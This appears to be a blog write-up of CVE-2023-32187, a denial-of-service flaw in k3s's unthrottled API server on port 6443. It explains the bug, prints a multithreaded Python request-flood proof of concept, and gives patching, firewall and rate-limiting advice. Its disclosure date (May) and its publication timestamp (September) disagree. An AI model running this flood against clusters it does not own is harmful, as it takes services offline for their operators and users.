In May 2023, a serious vulnerability was disclosed—CVE-2023-32187—affecting SUSE’s lightweight Kubernetes distribution, k3s. This problem is about lack of allocation limits or throttling, and it can let an attacker crash your entire Kubernetes cluster easily, just by talking to a certain port.
This write-up explains, in basic terms, what the vulnerability is, how it worked, and how attackers can exploit it, including a demo code snippet. Finally, we’ll provide info about how to protect your system and where to find original references.
What is CVE-2023-32187?
CVE-2023-32187 is an "Allocation of Resources Without Limits or Throttling" bug. That means the k3s server’s apiserver/supervisor service (which is normally on port 6443) did not limit or slow down incoming requests. So, if an attacker sends tons of requests—either bogus or abusive—the server can run out of memory, become unresponsive, and crash (a denial-of-service/DoS attack).
How Bad Is It?
If anybody can talk to your k3s API server on tcp/6443, and you have not patched, you are at risk. Attackers do *not* need a user account or cluster access. All it takes is network reachability to the port.
How Does the Exploit Work?
The k3s API endpoint on 6443 will accept and process as many connections/requests as the system can handle. Each request takes a bit of CPU and memory. If you make enough simultaneous connections—especially using large/complex payloads or continuous floods—the API server’s resource usage grows until it either becomes very slow or completely crashes.
The weak point: There were no effective limits or throttling on how fast a single client can make requests, or how much of the server’s memory or CPU is used per request.
Proof-of-Concept (PoC) Code: How to Reproduce the DoS
This Python code will hammer the API server with requests. It does the simplest thing—floods /version endpoint with tons of connections. In real attacks, you would add more threads or send more complex requests.
> Warning: Only test this on your own system! Never attack a server you don’t own.
import requests
import threading
API_SERVER = 'https://yourserver:6443/version';
NUM_THREADS = 100
def flood():
while True:
try:
# Ignore SSL warnings or use verify=False if using self-signed
requests.get(API_SERVER, verify=False, timeout=1)
except:
pass
threads = []
for _ in range(NUM_THREADS):
t = threading.Thread(target=flood)
t.start()
threads.append(t)
for t in threads:
t.join()
After running for a few minutes (or less), you will notice k3s API server is overloaded or stops responding. On weak hardware or cloud VMs, it can crash the node entirely.
How To Fix or Defend
1. Upgrade k3s:
1.28.1+k3s1
See SUSE’s official advisory for full details and downloads.
2. Firewall Restricted Access:
If possible, block external access to port 6443. Allow only nodes and users that *must* reach the API.
3. Network-level rate limiting:
Use firewalls, proxies, or load balancers to rate-limit connections to the API port.
Links and Original References
- GitHub Security Advisory GHSA-55fv-6v5j-mv58
- CVE-2023-32187 at NIST/NVD
- SUSE Security Announcements
Conclusion
CVE-2023-32187 is a classic denial-of-service caused by missing resource throttling in k3s’s API server. If your clusters expose tcp/6443 and run a vulnerable version, *anyone* with network access can crash them in seconds. This issue is fixed in new k3s releases—always update and use network protections for your critical Kubernetes servers!
For more deep dives and fresh CVE breakdowns, follow our posts. Stay safe—and *patch your clusters*!
Timeline
Published on: 09/18/2023 13:15:00 UTC
Last modified on: 09/21/2023 15:21:00 UTC